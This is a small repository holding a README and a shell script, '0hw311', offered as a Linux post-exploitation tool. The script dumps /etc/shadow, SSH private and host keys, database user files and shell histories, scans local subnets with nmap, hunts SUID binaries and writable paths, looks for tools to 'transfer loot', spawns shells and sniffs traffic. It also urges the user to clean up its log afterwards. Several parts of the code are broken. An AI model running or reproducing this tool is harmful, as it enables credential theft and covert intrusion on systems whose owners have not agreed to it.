├── README.md
└── scrape.sh
/README.md:
--------------------------------------------------------------------------------
1 | #0hw311
2 |
3 | * A shell script for linux post-exploitation.
4 |
5 |
6 | ( ) ( )
7 | .-. | | .-. ___ ___ ___ .--. .--. .--. | |
8 | / \ | |/ \ ( )( )( ) / \ (_ | (_ | | |
9 | | .-. ; | .-. . | | | | | | (___)`. | | | | | | |
10 | | | | | | | | | | | | | | | .-. / | | | | | |
11 | | | | | | | | | | | | | | | .. \ | | | | | |
12 | | | | | | | | | | | | | | | ___ \ . | | | | | |
13 | | . | | | | | | | | ; . | | ( ) ; | | | | | |_|
14 | . `-. / | | | | . `-. `-. . \ `-. / | | | | .-.
15 | `.__,. (___)(___) ..__...__.. .,__.. (___) (___) ( )
16 |
17 | #@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
18 |
19 | * Shell script to scrape, enumerate, or otherwise rape *nux systems,
20 | post exploitation.
21 | *
22 |
23 | * Based off of g0tmi1k.s excellent writeup on priv escalation: (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
24 | * Expanded project from bashrecon: (https://github.com/netrecon)
25 |
26 | # USAGE:
27 |
28 | ./0hw3ll
29 | -s|--scrape : Scrape the system. This will gather as much
30 | information as permissions allow. Caution:
31 | this may attract attention if you are on a
32 | pentest.
33 | -p|--pty : Try a variety of methods to upgrade to a pty
34 | terminal (If you don.t already have one)
35 | -d|--dump : Attempt packet capture through tcpdump. This
36 | usually requires root/sudo. Never know, though!
37 | -h|--help : Show this help.
38 |
--------------------------------------------------------------------------------
/scrape.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ####################################################################
3 | # Scraping *nux
4 | ####################################################################
5 | # Thanks to g0tmilk for the excellent write up:
6 | # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
7 | ##################
8 | doHelp(){
9 | echo -e'
10 | #@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
11 | # ( ) ( )
12 | # .-. | | .-. ___ ___ ___ .--. .--. .--. | |
13 | # / \ | |/ \ ( )( )( ) / \ (_ | (_ | | |
14 | #| .-. ; | .-. . | | | | | | (___)`. | | | | | | |
15 | #| | | | | | | | | | | | | | .-. / | | | | | |
16 | #| | | | | | | | | | | | | | .. \ | | | | | |
17 | #| | | | | | | | | | | | | | ___ \ . | | | | | |
18 | #| . | | | | | | | | ; . | | ( ) ; | | | | | |_|
19 | #. `-. / | | | | . `-. `-. . \ `-. / | | | | .-.
20 | # `.__,. (___)(___) ..__...__.. .,__.. (___) (___) ( )
21 | #@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
22 | # Shell script to scrape, enumerate, or otherwise rape *nux systems.
23 | #@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
24 | #
25 | ## Based off of g0tmi1k.s excellent writeup on priv escalation:
26 | # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
27 | #@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
28 | >> USAGE: $0
29 | -s|--scrape : Scrape the system. This will gather as much
30 | information as permissions allow. Caution:
31 | this may attract attention if you are on a
32 | pentest.
33 | -p|--pty : Try a variety of methods to upgrade to a pty
34 | terminal (If you don.t already have one)
35 | -d|--dump : Attempt packet capture through tcpdump. This
36 | usually requires root/sudo. Never know, though!
37 | -h|--help : Show this help.
38 | #@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
39 | '
40 | }
41 | ### Bash Recon ###
42 | cwd=$(pwd)
43 | out=$cwd/0hw311.log
44 | #
45 | bashrecon(){
46 | RIGHT_NOW=$(date +"%x %r %Z")
47 | pubIP=$(curl ipecho.net/plain;echo)
48 | ########################
49 | INTFACES=$(/sbin/ifconfig -a | sed 's/[ \t].*//;/^\(lo\|\)$/d')
50 | intIPS=$(for i in ${INTFACES}; do /sbin/ifconfig $i | grep Mask | cut -d ':' -f2 | cut -d " " -f1; done)
51 | intSNS=$(for i in ${intIPS}; do echo $i | cut -d "." -f -3 | sed 's/$/.*/'; done)
52 | sn_RESULTS=$(for i in ${intSNS}; do nmap -sV -F $i; done)
53 | pi_RESULTS=$(nmap -sV -F ${pubIP})
54 | ########################
55 | echo ${sn_RESULTS}
56 | echo ${pi_RESULTS}
57 |
58 | cat /etc/network/interfaces
59 | cat /etc/sysconfig/network
60 | cat /etc/resolv.conf
61 | cat /etc/sysconfig/network
62 | cat /etc/networks
63 |
64 | if [[ whoami == "root" ]];
65 | then
66 | iptables -L || echo 'We are not root'
67 | else
68 | sudo iptables -V >/dev/null 2>&! || { echo 'We got no sudo' && exit 1 ;}
69 | fi
70 |
71 | arp -e
72 | route -n
73 | /sbin/route -nee
74 | hostname
75 | dnsdomainname
76 | }
77 | #
78 |
79 | getEnv(){
80 |
81 | #system
82 | cat /etc/issue
83 | cat /etc/*-release
84 | cat /etc/lsb-release # Debian based
85 | cat /etc/redhat-release # Redhat based
86 | # kernel
87 | cat /proc/version
88 | uname -a
89 | uname -mrs
90 | rpm -q kernel
91 | dmesg | grep Linux
92 | ls /boot | grep vmlinuz-
93 | #env
94 | cat /etc/profile
95 | cat /etc/bashrc
96 | cat ~/.bash_profile
97 | cat ~/.bashrc
98 | cat ~/.bash_logout
99 | env
100 | set
101 | # find printers
102 | lpstat -a
103 | # get running services
104 | ps aux
105 | ps -ef
106 | ps aux | grep root
107 | ps -ef | grep root
108 | cat /etc/services
109 | # installed programs
110 | ls -alh /usr/bin/
111 | ls -alh /sbin/
112 | dpkg -l || echo 'Not a debian sys..'
113 | rpm -qa || echo 'Not a rhel sys either...'
114 | ls -alh /var/cache/apt/archives*
115 | ls -alh /var/cache/yum/
116 |
117 | # find misconfigured services
118 |
119 | cat /etc/syslog.conf
120 | cat /etc/chttp.conf
121 | cat /etc/lighttpd.conf
122 | cat /etc/cups/cupsd.conf
123 | cat /etc/inetd.conf
124 | cat /etc/apache2/apache2.conf
125 | cat /etc/my.conf
126 | cat /etc/httpd/conf/httpd.conf
127 | cat /opt/lampp/etc/httpd.conf
128 | sh -c "ls -aRl /etc/ | awk '$1 ~ /^.*r.*"
129 |
130 | #grep -i user [filename]
131 | #grep -i pass [filename]
132 | #grep -C 5 "password" [filename]
133 | find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
134 | cat /etc/passwd
135 | cat /etc/group
136 | cat /etc/shadow
137 | ls -alh /var/mail/
138 | ls -la ~/.ssh/
139 | cat ~/.ssh/config
140 | cat /var/apache2/config.inc
141 | cat /var/lib/mysql/mysql/user.MYD
142 | cat /root/anaconda-ks.cfg
143 | cat ~/.ssh/authorized_keys
144 | cat ~/.ssh/identity.pub
145 | cat ~/.ssh/identity
146 | cat ~/.ssh/id_rsa*.pub
147 | cat ~/.ssh/id_rsa*
148 | cat ~/.ssh/id_dsa.pub
149 | cat ~/.ssh/id_dsa
150 | cat /etc/ssh/ssh_config
151 | cat /etc/ssh/sshd_config
152 | cat /etc/ssh/ssh_host_dsa_key.pub
153 | cat /etc/ssh/ssh_host_dsa_key
154 | cat /etc/ssh/ssh_host_rsa_key.pub
155 | cat /etc/ssh/ssh_host_rsa_key
156 | cat /etc/ssh/ssh_host_key.pub
157 | cat /etc/ssh/ssh_host_key
158 |
159 | id
160 | id -u
161 | groups
162 | who
163 | w
164 | last
165 | cat /etc/passwd | cut -d: # List of users
166 | grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
167 | awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
168 | cat /etc/sudoers
169 | sudo -l
170 |
171 | # what do we got @home?
172 |
173 | ls -ahlR /root/
174 | ls -ahlR /home/
175 | ls -ahlR /
176 |
177 | # enum hist
178 |
179 | cat ~/.bash_history
180 | cat ~/.nano_history
181 | cat ~/.atftp_history
182 | cat ~/.mysql_history
183 | cat ~/.php_history
184 | # and env
185 | cat ~/.bashrc
186 | cat ~/.profile
187 | head -n 100 /var/mail/root
188 | head -n 100 /var/spool/mail/root
189 |
190 | # what can we mess with?
191 |
192 | ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
193 | ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
194 | ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
195 | ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
196 |
197 | find /etc/ -readable -type f 2>/dev/null # Anyone
198 | find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
199 |
200 | # variable data please?
201 | ls -alh /var/log
202 | ls -alh /var/mail
203 | ls -alh /var/spool
204 | ls -alh /var/spool/lpd
205 | ls -alh /var/lib/pgsql
206 | ls -alh /var/lib/mysql
207 | cat /var/lib/dhcp3/dhclient.leases
208 |
209 | # databases
210 |
211 | ls -alhR /var/www/
212 | ls -alhR /srv/www/htdocs/
213 | ls -alhR /usr/local/www/apache22/data/
214 | ls -alhR /opt/lampp/htdocs/
215 | ls -alhR /var/www/html/
216 |
217 | # enum logs
218 |
219 | cat /etc/httpd/logs/access_log
220 | cat /etc/httpd/logs/access.log
221 | cat /etc/httpd/logs/error_log
222 | cat /etc/httpd/logs/error.log
223 | cat /var/log/apache2/access_log
224 | cat /var/log/apache2/access.log
225 | cat /var/log/apache2/error_log
226 | cat /var/log/apache2/error.log
227 | cat /var/log/apache/access_log
228 | cat /var/log/apache/access.log
229 | cat /var/log/auth.log
230 | cat /var/log/chttp.log
231 | cat /var/log/cups/error_log
232 | cat /var/log/dpkg.log
233 | cat /var/log/faillog
234 | cat /var/log/httpd/access_log
235 | cat /var/log/httpd/access.log
236 | cat /var/log/httpd/error_log
237 | cat /var/log/httpd/error.log
238 | cat /var/log/lastlog
239 | cat /var/log/lighttpd/access.log
240 | cat /var/log/lighttpd/error.log
241 | cat /var/log/lighttpd/lighttpd.access.log
242 | cat /var/log/lighttpd/lighttpd.error.log
243 | cat /var/log/messages
244 | cat /var/log/secure
245 | cat /var/log/syslog
246 | cat /var/log/wtmp
247 | cat /var/log/xferlog
248 | cat /var/log/yum.log
249 | cat /var/run/utmp
250 | cat /var/webmin/miniserv.log
251 | cat /var/www/logs/access_log
252 | cat /var/www/logs/access.log
253 | ls -alh /var/lib/dhcp3/
254 | ls -alh /var/log/postgresql/
255 | ls -alh /var/log/proftpd/
256 | ls -alh /var/log/samba/
257 |
258 | lsof -i
259 | lsof -i :80
260 | grep 80 /etc/services
261 | netstat -antup
262 | netstat -antpx
263 | netstat -tulpn
264 | chkconfig --list
265 | chkconfig --list | grep 3:on
266 | last
267 | w
268 | mount
269 | df -h
270 | cat /etc/fstab
271 |
272 | }
273 |
274 |
275 | getCrons(){
276 | # get cron jobs
277 | crontab -l
278 | ls -alh /var/spool/cron
279 | ls -al /etc/ | grep cron
280 | ls -al /etc/cron*
281 | cat /etc/cron*
282 | cat /etc/at.allow
283 | cat /etc/at.deny
284 | cat /etc/cron.allow
285 | cat /etc/cron.deny
286 | cat /etc/crontab
287 | cat /etc/anacrontab
288 | cat /var/spool/cron/crontabs/root
289 | }
290 |
291 | getSUID(){
292 | # setu/g/id mmmk?
293 | if [ ! -d /home/.ecryptfs ]
294 | then
295 | fpath="/"
296 | else
297 | fpath="/ -not -path "/home/*""
298 | fi
299 | find $fpath -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
300 | find $fpath -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
301 | find $fpath -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
302 |
303 | find $fpath -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
304 | for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
305 |
306 | # find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
307 | find $fpath -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
308 | # what can we write to?
309 |
310 | find $fpath -writable -type d 2>/dev/null # world-writeable folders
311 | find $fpath -perm -222 -type d 2>/dev/null # world-writeable folders
312 | find $fpath -perm -o w -type d 2>/dev/null # world-writeable folders
313 |
314 | find $fpath -perm -o x -type d 2>/dev/null # world-executable folders
315 |
316 | find $fpath \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
317 |
318 |
319 | # anything weird already happening here?
320 |
321 | find $fpath -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files
322 | find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
323 |
324 |
325 | # what dev tools we got to exploit?
326 |
327 | find $fpath -name perl*
328 | find $fpath -name python*
329 | find $fpath -name gcc*
330 | find $fpath -name g++*
331 | find $fpath -name cc
332 |
333 |
334 |
335 |
336 | # how can we transfer loot?
337 | which wget || find $fpath -name wget
338 | which curl || find $fpath -name curl
339 | which nc || find $fpath -name nc*
340 | which netcat || find $fpath -name netcat*
341 | which tftp || find $fpath -name tftp*
342 | which ftp || find $fpath -name ftp
343 | which ncat || find $fpath -name ncat*
344 | which telnet || find $fpath -name telnet*
345 | echo -en "\nIf you can see a new line here: \n;than this does not have echo -e\n"
346 | which base64 || echo 'Wtf no base64'
347 | }
348 |
349 | spawnPty(){
350 |
351 | echo 'Trying to spawn a tty...'
352 | if ! /bin/sh -i;then
353 | if ! python -c 'import pty;pty.spawn("/bin/bash")';then
354 | #if ! echo os.system('/bin/bash');then
355 | if ! perl —e 'exec "/bin/sh";';then
356 | if ! perl: exec "/bin/sh";then
357 | if ! ruby: exec "/bin/sh";then
358 | #if ! lua: os.execute('/bin/sh');then
359 | echo ""
360 | fi
361 | fi
362 | fi
363 | fi
364 | #fi
365 | #fi
366 | #fi
367 | echo 'Crap. One options left. Checking for expect...'
368 | if ! expect -c 'spawn sh;interact';then
369 | echo "Sorry, could not get a pty!"
370 | fi
371 |
372 | else
373 |
374 | echo 'Exited pty...'
375 | fi
376 |
377 | }
378 |
379 | trySniff(){
380 | for i in "$(/sbin/ifconfig -a | sed 's/[ \t].*//;/^\(lo\|\)$/d')";do tcpdump -i $i & > "$cwd/sniff.$i.log" 2>&1;done
381 | }
382 |
383 | case $1 in
384 |
385 | -s|--scrape)
386 | echo 'Scraping the system... After this is done (if it ever finishes), try running with --pty or --sniff ...'
387 | scrapeIt | tee -a $out &>2 >> /dev/null
388 | bashrecon | tee -a $out &>2 >> /dev/null
389 | getEnv | tee -a $out &>2 >> /dev/null
390 | getCrons | tee -a $out &>2 >> /dev/null
391 | getSUID | tee -a $out &>2 >> /dev/null
392 | echo 'Done! Make sure you clean up the log!'
393 | ;;
394 |
395 | -P|--pty|--spawn-pty|--spawnpty|--getpty|--get-pty)
396 | if [ "`tty`" != "not a tty" ]
397 | then
398 | spawnPty
399 | else
400 | echo 'You are already in a pty! Use -f/--force to do it anyway.'
401 | fi
402 | ;;
403 |
404 | #case $2 in
405 | #-f | --force)
406 | #echo 'Sure, why not? Attempting to spawn anyway because of --force...'
407 | -d|-dump|tcpdump|--sniff)
408 | trySniff
409 | ;;
410 |
411 |
412 | -h|--help)
413 | doHelp
414 | ;;
415 |
416 | esac
417 |
418 | exit
419 |
--------------------------------------------------------------------------------